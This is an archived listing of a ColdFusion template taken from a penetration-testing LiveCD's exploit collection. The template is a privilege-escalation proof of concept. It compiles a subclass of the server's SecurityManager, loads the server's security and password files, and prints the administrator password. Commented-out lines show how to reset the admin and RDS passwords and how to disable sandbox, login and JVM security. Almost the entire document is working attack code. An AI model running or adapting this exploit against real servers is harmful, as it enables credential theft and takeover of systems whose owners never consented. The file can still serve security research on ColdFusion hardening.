home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / coldfusion / coldFusionTemplatePrivEscPOC.txt < prev    next >
Encoding:
Text File  |  2005-02-12  |  2.0 KB  |  103 lines
  1. <cfscript>
  2.  
  3. objFileWriter = CreateObject("java","java.io.FileWriter");
  4.  
  5. objByteArray = CreateObject("java","java.io.ByteArrayOutputStream");
  6.  
  7. objJavaC = CreateObject("java","sun.tools.javac.Main");
  8.  
  9. objString = CreateObject("java","java.lang.String");
  10.  
  11. objFile = CreateObject("java","java.io.File");
  12.  
  13. if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }
  14.  
  15. strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java"; 
  16.  
  17. strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar";
  18.  
  19. strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml";
  20.  
  21. strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties";
  22.  
  23. fileWriter = objFileWriter.init("#strJavaSource#",false);
  24.  
  25. fileWriter.write("import coldfusion.security.SecurityManager;");
  26.  
  27. fileWriter.write("import java.io.File;");
  28.  
  29. fileWriter.write("public class SecurityExploit extends SecurityManager {");
  30.  
  31. fileWriter.write("public SecurityExploit(File arg0, File arg1) {");
  32.  
  33. fileWriter.write("super(arg0, arg1); }");
  34.  
  35. fileWriter.write("public boolean isAdminSecurityEnabled(){");
  36.  
  37. fileWriter.write("return false;}}");
  38.  
  39. fileWriter.flush();
  40.  
  41. fileWriter.close();
  42.  
  43. str = objString.init("-classpath,#strCfusionJar#,#strJavaSource#");
  44.  
  45. strArr = str.split(",");
  46.  
  47. byteArray = objByteArray.init();
  48.  
  49. compileObj =objJavaC.init(byteArray,str);
  50.  
  51. compileObj.compile(strArr);
  52.  
  53. obj = CreateObject("java","SecurityExploit");
  54.  
  55. file1 = objFile.init("#strNeoSecFile#");
  56.  
  57. file2 = objFile.init("#strPasswdFile#");
  58.  
  59. obj.init(file1,file2);
  60.  
  61. obj.load();
  62.  
  63. </cfscript>
  64.  
  65. <cfscript>
  66.  
  67. // Get Administrator Password 
  68.  
  69. strAdminPw = obj.getAdminPassword();
  70.  
  71. // Set Administrator Password
  72.  
  73. //obj.setAdminPassword("test123");
  74.  
  75.  
  76. // Turn off Sandbox Security
  77.  
  78. //obj.setSandboxSecurityEnabled(false);
  79.  
  80.  
  81. // Turn off Administrator Login
  82.  
  83. //obj.setAdminSecurityEnabled(false);
  84.  
  85.  
  86. // Turn off RDS Login
  87.  
  88. //obj.setRdsSecurityEnabled(false);
  89.  
  90.  
  91. // Set RDS Password
  92.  
  93. //obj.setRdsPassword("test123");
  94.  
  95.  
  96. // Turn off JVM Security
  97.  
  98. //obj.setJvmSecurityEnabled(false);
  99.  
  100. </cfscript>
  101.  
  102. <cfoutput>Adminstrator Password: #strAdminPw#</cfoutput>
  103.